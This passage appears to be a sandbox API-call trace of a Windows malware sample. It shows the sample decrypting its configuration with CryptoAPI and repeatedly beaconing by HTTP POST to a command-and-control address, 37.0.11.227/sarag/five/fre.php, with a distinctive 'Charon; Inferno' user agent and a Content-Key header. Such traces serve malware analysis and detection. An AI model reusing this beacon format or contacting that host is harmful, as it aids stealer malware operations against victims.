pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0229.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.181] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.182] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.182] GetProcessHeap () returned 0x690000 [0229.182] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0229.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.183] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0229.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.184] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0229.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.185] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0229.185] GetProcessHeap () returned 0x690000 [0229.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0229.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.186] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.190] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.191] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.192] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.192] GetProcessHeap () returned 0x690000 [0229.192] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0229.192] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0229.192] GetProcessHeap () returned 0x690000 [0229.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0229.193] GetProcessHeap () returned 0x690000 [0229.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0229.195] GetProcessHeap () returned 0x690000 [0229.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0229.195] GetProcessHeap () returned 0x690000 [0229.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0229.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.196] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0229.207] GetProcessHeap () returned 0x690000 [0229.207] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0229.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.208] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0229.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.209] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.211] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.211] GetProcessHeap () returned 0x690000 [0229.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0229.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.212] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0229.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.213] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0229.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.214] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0229.214] GetProcessHeap () returned 0x690000 [0229.214] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0229.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.215] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0229.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.216] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0229.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.217] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0229.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.217] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0229.217] GetProcessHeap () returned 0x690000 [0229.217] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0229.217] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0229.218] GetProcessHeap () returned 0x690000 [0229.218] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0229.218] socket (af=2, type=1, protocol=6) returned 0x5d8 [0229.218] connect (s=0x5d8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0229.240] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0229.240] GetProcessHeap () returned 0x690000 [0229.240] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0229.240] GetProcessHeap () returned 0x690000 [0229.240] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0229.240] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0229.241] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0229.241] GetProcessHeap () returned 0x690000 [0229.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0229.241] GetProcessHeap () returned 0x690000 [0229.242] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0229.244] GetProcessHeap () returned 0x690000 [0229.244] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0229.244] GetProcessHeap () returned 0x690000 [0229.244] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0229.244] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0229.245] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0229.245] GetProcessHeap () returned 0x690000 [0229.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0229.245] GetProcessHeap () returned 0x690000 [0229.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0229.246] send (s=0x5d8, buf=0x6ad508*, len=242, flags=0) returned 242 [0229.246] send (s=0x5d8, buf=0x6aba40*, len=159, flags=0) returned 159 [0229.246] GetProcessHeap () returned 0x690000 [0229.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0229.246] recv (in: s=0x5d8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0229.316] GetProcessHeap () returned 0x690000 [0229.316] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0229.317] GetProcessHeap () returned 0x690000 [0229.317] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0229.317] GetProcessHeap () returned 0x690000 [0229.319] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0229.320] GetProcessHeap () returned 0x690000 [0229.320] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0229.320] closesocket (s=0x5d8) returned 0 [0229.323] GetProcessHeap () returned 0x690000 [0229.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0229.323] GetProcessHeap () returned 0x690000 [0229.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0229.324] GetProcessHeap () returned 0x690000 [0229.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0229.326] GetProcessHeap () returned 0x690000 [0229.327] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0229.327] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x874) returned 0x5d8 [0229.328] Sleep (dwMilliseconds=0xea60) [0229.330] GetProcessHeap () returned 0x690000 [0229.330] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0229.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.331] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.336] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0229.341] GetProcessHeap () returned 0x690000 [0229.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0229.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.341] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0229.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.343] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.344] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.344] GetProcessHeap () returned 0x690000 [0229.344] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0229.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.347] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0229.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.349] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0229.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.351] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0229.351] GetProcessHeap () returned 0x690000 [0229.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0229.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.353] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.361] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.362] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.363] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.363] GetProcessHeap () returned 0x690000 [0229.363] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0229.363] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0229.363] GetProcessHeap () returned 0x690000 [0229.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0229.364] GetProcessHeap () returned 0x690000 [0229.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0229.364] GetProcessHeap () returned 0x690000 [0229.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0229.365] GetProcessHeap () returned 0x690000 [0229.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0229.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.366] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.370] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0229.375] GetProcessHeap () returned 0x690000 [0229.375] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0229.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.376] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0229.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.377] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.377] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.377] GetProcessHeap () returned 0x690000 [0229.378] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0229.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.379] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0229.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.380] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0229.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.381] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0229.381] GetProcessHeap () returned 0x690000 [0229.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0229.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.382] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0229.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.383] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0229.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.383] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0229.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.384] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0229.384] GetProcessHeap () returned 0x690000 [0229.384] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0229.384] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0229.384] GetProcessHeap () returned 0x690000 [0229.384] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0229.384] socket (af=2, type=1, protocol=6) returned 0x5dc [0229.385] connect (s=0x5dc, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0229.409] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0229.409] GetProcessHeap () returned 0x690000 [0229.409] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0229.409] GetProcessHeap () returned 0x690000 [0229.409] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0229.410] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0229.410] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0229.410] GetProcessHeap () returned 0x690000 [0229.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0229.410] GetProcessHeap () returned 0x690000 [0229.411] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0229.411] GetProcessHeap () returned 0x690000 [0229.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0229.411] GetProcessHeap () returned 0x690000 [0229.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0229.412] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0229.412] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0229.412] GetProcessHeap () returned 0x690000 [0229.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0229.412] GetProcessHeap () returned 0x690000 [0229.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0229.413] send (s=0x5dc, buf=0x6ad508*, len=242, flags=0) returned 242 [0229.413] send (s=0x5dc, buf=0x6aba40*, len=159, flags=0) returned 159 [0229.413] GetProcessHeap () returned 0x690000 [0229.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0229.413] recv (in: s=0x5dc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0229.487] GetProcessHeap () returned 0x690000 [0229.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0229.489] GetProcessHeap () returned 0x690000 [0229.489] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0229.489] GetProcessHeap () returned 0x690000 [0229.489] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0229.490] GetProcessHeap () returned 0x690000 [0229.490] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0229.490] closesocket (s=0x5dc) returned 0 [0229.490] GetProcessHeap () returned 0x690000 [0229.490] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0229.491] GetProcessHeap () returned 0x690000 [0229.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0229.491] GetProcessHeap () returned 0x690000 [0229.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0229.491] GetProcessHeap () returned 0x690000 [0229.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0229.495] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfc0) returned 0x5dc [0229.497] Sleep (dwMilliseconds=0xea60) [0229.498] GetProcessHeap () returned 0x690000 [0229.498] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0229.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.499] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.504] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0229.514] GetProcessHeap () returned 0x690000 [0229.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0229.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.515] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0229.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.516] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.517] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.517] GetProcessHeap () returned 0x690000 [0229.517] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0229.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.518] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0229.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.519] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0229.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.522] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0229.522] GetProcessHeap () returned 0x690000 